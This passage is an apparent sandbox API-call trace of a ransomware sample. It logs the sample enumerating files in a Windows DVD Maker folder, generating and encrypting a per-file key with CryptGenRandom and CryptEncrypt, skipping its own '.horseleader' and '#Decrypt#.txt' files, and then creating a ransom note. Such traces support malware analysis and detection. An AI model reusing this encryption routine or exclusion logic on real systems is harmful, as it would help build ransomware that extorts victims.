(normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.604] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7116fa23, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7116fa23, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d27ad27, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2a88, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="btn-back-static.png", cAlternateFileName="")) returned 1 [0251.605] lstrcmpiW (lpString1="btn-back-static.png", lpString2="Windows") returned -1 [0251.605] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png") returned 76 [0251.605] StrStrIW (lpFirst="btn-back-static.png", lpSrch=".horseleader") returned 0x0 [0251.605] lstrcmpW (lpString1="btn-back-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.605] lstrcmpW (lpString1="btn-back-static.png", lpString2="_uninstalling_.png") returned 1 [0251.605] lstrlenW (lpString=".testttjffg") returned 11 [0251.605] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png", lpSrch=".testttjffg") returned 0x0 [0251.605] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.605] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.605] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.605] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7116fa23, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7116fa23, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d27ad27, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x280e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="btn-next-static.png", cAlternateFileName="")) returned 1 [0251.605] lstrcmpiW (lpString1="btn-next-static.png", lpString2="Windows") returned -1 [0251.605] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png") returned 76 [0251.606] StrStrIW (lpFirst="btn-next-static.png", lpSrch=".horseleader") returned 0x0 [0251.606] lstrcmpW (lpString1="btn-next-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.606] lstrcmpW (lpString1="btn-next-static.png", lpString2="_uninstalling_.png") returned 1 [0251.606] lstrlenW (lpString=".testttjffg") returned 11 [0251.606] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png", lpSrch=".testttjffg") returned 0x0 [0251.606] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.606] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.606] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-next-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.606] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711bbcdd, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x711bbcdd, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d27ad27, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2808, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="btn-previous-static.png", cAlternateFileName="")) returned 1 [0251.606] lstrcmpiW (lpString1="btn-previous-static.png", lpString2="Windows") returned -1 [0251.606] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png") returned 80 [0251.606] StrStrIW (lpFirst="btn-previous-static.png", lpSrch=".horseleader") returned 0x0 [0251.607] lstrcmpW (lpString1="btn-previous-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.607] lstrcmpW (lpString1="btn-previous-static.png", lpString2="_uninstalling_.png") returned 1 [0251.607] lstrlenW (lpString=".testttjffg") returned 11 [0251.607] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png", lpSrch=".testttjffg") returned 0x0 [0251.607] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.607] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.607] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-previous-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.608] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711bbcdd, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x711bbcdd, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x946, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="button-highlight.png", cAlternateFileName="")) returned 1 [0251.608] lstrcmpiW (lpString1="button-highlight.png", lpString2="Windows") returned -1 [0251.608] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png") returned 77 [0251.608] StrStrIW (lpFirst="button-highlight.png", lpSrch=".horseleader") returned 0x0 [0251.608] lstrcmpW (lpString1="button-highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.608] lstrcmpW (lpString1="button-highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.608] lstrlenW (lpString=".testttjffg") returned 11 [0251.608] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.608] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.608] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.608] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\button-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.609] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711e1e3a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x711e1e3a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6bbd, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="button-overlay.png", cAlternateFileName="")) returned 1 [0251.609] lstrcmpiW (lpString1="button-overlay.png", lpString2="Windows") returned -1 [0251.609] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png") returned 75 [0251.609] StrStrIW (lpFirst="button-overlay.png", lpSrch=".horseleader") returned 0x0 [0251.609] lstrcmpW (lpString1="button-overlay.png", lpString2="#Decrypt#.txt") returned 1 [0251.609] lstrcmpW (lpString1="button-overlay.png", lpString2="_uninstalling_.png") returned 1 [0251.609] lstrlenW (lpString=".testttjffg") returned 11 [0251.609] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png", lpSrch=".testttjffg") returned 0x0 [0251.609] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.609] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.609] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\button-overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.610] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71207f97, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71207f97, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb53, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Memories_buttonClear.png", cAlternateFileName="")) returned 1 [0251.610] lstrcmpiW (lpString1="Memories_buttonClear.png", lpString2="Windows") returned -1 [0251.610] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png") returned 81 [0251.610] StrStrIW (lpFirst="Memories_buttonClear.png", lpSrch=".horseleader") returned 0x0 [0251.610] lstrcmpW (lpString1="Memories_buttonClear.png", lpString2="#Decrypt#.txt") returned 1 [0251.610] lstrcmpW (lpString1="Memories_buttonClear.png", lpString2="_uninstalling_.png") returned 1 [0251.610] lstrlenW (lpString=".testttjffg") returned 11 [0251.610] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png", lpSrch=".testttjffg") returned 0x0 [0251.610] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.610] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.610] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\memories_buttonclear.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.611] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7122e0f4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7122e0f4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2a88, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Notes_btn-back-static.png", cAlternateFileName="")) returned 1 [0251.611] lstrcmpiW (lpString1="Notes_btn-back-static.png", lpString2="Windows") returned -1 [0251.611] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png") returned 82 [0251.611] StrStrIW (lpFirst="Notes_btn-back-static.png", lpSrch=".horseleader") returned 0x0 [0251.611] lstrcmpW (lpString1="Notes_btn-back-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.611] lstrcmpW (lpString1="Notes_btn-back-static.png", lpString2="_uninstalling_.png") returned 1 [0251.611] lstrlenW (lpString=".testttjffg") returned 11 [0251.611] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png", lpSrch=".testttjffg") returned 0x0 [0251.611] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.611] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.611] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\notes_btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.611] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7127a3ae, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7127a3ae, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1a7ed, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Notes_content-background.png", cAlternateFileName="")) returned 1 [0251.611] lstrcmpiW (lpString1="Notes_content-background.png", lpString2="Windows") returned -1 [0251.612] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png") returned 85 [0251.612] StrStrIW (lpFirst="Notes_content-background.png", lpSrch=".horseleader") returned 0x0 [0251.612] lstrcmpW (lpString1="Notes_content-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.612] lstrcmpW (lpString1="Notes_content-background.png", lpString2="_uninstalling_.png") returned 1 [0251.612] lstrlenW (lpString=".testttjffg") returned 11 [0251.612] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png", lpSrch=".testttjffg") returned 0x0 [0251.612] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.612] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.612] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\notes_content-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.613] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x710b1352, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x710b1352, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4f7a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="scrapbook.png", cAlternateFileName="")) returned 1 [0251.613] lstrcmpiW (lpString1="scrapbook.png", lpString2="Windows") returned -1 [0251.613] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png") returned 70 [0251.613] StrStrIW (lpFirst="scrapbook.png", lpSrch=".horseleader") returned 0x0 [0251.613] lstrcmpW (lpString1="scrapbook.png", lpString2="#Decrypt#.txt") returned 1 [0251.614] lstrcmpW (lpString1="scrapbook.png", lpString2="_uninstalling_.png") returned 1 [0251.614] lstrlenW (lpString=".testttjffg") returned 11 [0251.614] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png", lpSrch=".testttjffg") returned 0x0 [0251.614] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.614] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.614] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\scrapbook.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.614] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712c6668, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x712c6668, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x390c4, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_content-background.png", cAlternateFileName="")) returned 1 [0251.614] lstrcmpiW (lpString1="Title_content-background.png", lpString2="Windows") returned -1 [0251.614] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png") returned 85 [0251.614] StrStrIW (lpFirst="Title_content-background.png", lpSrch=".horseleader") returned 0x0 [0251.614] lstrcmpW (lpString1="Title_content-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.615] lstrcmpW (lpString1="Title_content-background.png", lpString2="_uninstalling_.png") returned 1 [0251.615] lstrlenW (lpString=".testttjffg") returned 11 [0251.615] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png", lpSrch=".testttjffg") returned 0x0 [0251.615] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.615] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.615] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_content-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.615] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712ec7c5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x712ec7c5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2c6fe3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1368, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_mainImage-mask.png", cAlternateFileName="")) returned 1 [0251.615] lstrcmpiW (lpString1="Title_mainImage-mask.png", lpString2="Windows") returned -1 [0251.615] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png") returned 81 [0251.615] StrStrIW (lpFirst="Title_mainImage-mask.png", lpSrch=".horseleader") returned 0x0 [0251.615] lstrcmpW (lpString1="Title_mainImage-mask.png", lpString2="#Decrypt#.txt") returned 1 [0251.615] lstrcmpW (lpString1="Title_mainImage-mask.png", lpString2="_uninstalling_.png") returned 1 [0251.615] lstrlenW (lpString=".testttjffg") returned 11 [0251.615] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png", lpSrch=".testttjffg") returned 0x0 [0251.616] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.616] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.616] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_mainimage-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.616] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712ec7c5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x712ec7c5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc47, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_select-highlight.png", cAlternateFileName="")) returned 1 [0251.616] lstrcmpiW (lpString1="Title_select-highlight.png", lpString2="Windows") returned -1 [0251.616] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png") returned 83 [0251.616] StrStrIW (lpFirst="Title_select-highlight.png", lpSrch=".horseleader") returned 0x0 [0251.616] lstrcmpW (lpString1="Title_select-highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.616] lstrcmpW (lpString1="Title_select-highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.616] lstrlenW (lpString=".testttjffg") returned 11 [0251.616] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.616] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.616] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.616] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_select-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.617] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712ec7c5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x712ec7c5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc47, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_select-highlight.png", cAlternateFileName="")) returned 0 [0251.617] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.618] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\#Decrypt#.txt") returned 70 [0251.618] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 